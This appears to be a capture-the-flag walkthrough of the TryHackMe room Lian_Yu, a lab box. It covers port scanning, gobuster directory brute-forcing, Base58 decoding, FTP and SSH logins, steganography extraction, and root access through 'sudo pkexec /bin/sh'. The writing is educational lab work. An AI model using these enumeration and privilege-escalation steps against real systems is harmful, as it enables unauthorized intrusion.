WriteUp — THM Lian_Yu

Welcome to Lian_YU, this Arrowverse themed beginner CTF box! Capture the flags and have fun.

This is a writeup for TryHackMe room Lian_Yu.

Photo by Michael on Unsplash

Start with nmap.

nmap -sC -sV -p- 10.10.61.139 1 ⨯
Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–13 12:51 EEST
Nmap scan report for 10.10.61.139
Host is up (0.055s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo: 
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 41886/tcp status
| 100024 1 44506/tcp6 status
| 100024 1 49721/udp status
|_ 100024 1 55595/udp6 status
41886/tcp open status 1 (RPC #100024)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.11 seconds

Enumerate web server.

gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.61.139/ dir
/island (Status: 301)

Let’s take a look. A single HTML page.

Hidden inside HTML source is the code word:

The Code Word is: </p><h2 style="color:white"> vigilante</h2>

Need to enumerate further. Had to look at the hint to figure out that the web directory we are looking for is a four digit number. Didn’t find it on root so let’s run it against /island.

seq -w 0 9999 > numbers.txt
gobuster -q -w numbers.txt -u http://10.10.61.139/island dir
/2100 (Status: 301)

Let’s look at the HTML source:

<!-- you can avail your .ticket here but how?   -->

Based on the task description look for files in the directory. Answer mask seems to hint at six letter extension, so guess that it is ticket and do another monster enumeration (sigh):

gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ticket -u http://10.10.61.139/island/2100 dir
/green_arrow.ticket (Status: 200)

Let’s retrieve it: http://10.10.61.139/island/2100/green_arrow.ticket

This is just a token to get into Queen's Gambit(Ship)


__REDACTED__

The hint points to some Base encoding so try to figure that out. By testing different options. Finally __REDACTED__ is accepted as answer using Base58 encoding. Now need to figure out username, could it be vigilante? Yes. I was already starting to worry about having to do another enumeration.

Log in to the FTP server and take a look around. There is another user called slade but his directory cannot be accessed. Retrieve three interesting pictures from vigilantes directory. One of them cannot be opened: Leave_me_alone.png. Exiftool points to an error:

exiftool Leave_me_alone.png
ExifTool Version Number : 12.07
File Name : Leave_me_alone.png
Directory : .
File Size : 500 kB
File Modification Date/Time : 2020:10:13 14:39:01+03:00
File Access Date/Time : 2020:10:13 14:39:30+03:00
File Inode Change Date/Time : 2020:10:13 14:39:01+03:00
File Permissions : rw-r — r — 
Error : File format error

looking at the file it seems that it doesn’t have PNG header (http://www.libpng.com/pub/png/book/chapter08.html) Maybe if it is repaired the image can be opened? Firing up hexedit and fixing the first few bytes produces a result:

try that to steghide and aa.jpg:

steghide extract -sf aa.jpg 
Enter passphrase: 
wrote extracted data to “ss.zip”.

The zip file can be extracted using unzip and one file contains a potential password. Let’s try to login with that. The password doesn't work for vigilante so let’s try with the other user slade. It works and we can grab user.txt.

THM{__REDACTED__}

Let’s take a look at slade’s files. .Important seems interesting:

cat .Important 
What are you Looking for ?
root Privileges ?
try to find Secret_Mission

ok, let’s find it:

find / -iname “*Secret_Mission” 2>/dev/null
/usr/src/Secret_Mission

It hints to super powers so:

sudo -l
[sudo] password for slade: 
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec

Check GTFOBins for abuse help: https://gtfobins.github.io/gtfobins/pkexec/

sudo pkexec /bin/sh
# whoami
root

Grab the flag from /root/root.txt and we are done with this room. A lot of directory enumeration went into this one and fixing the PNG header was not that straightforward to figure out. Another option would have been to do a dictionary attack directly to aa.jpg with steghide since the password was so trivial in the end.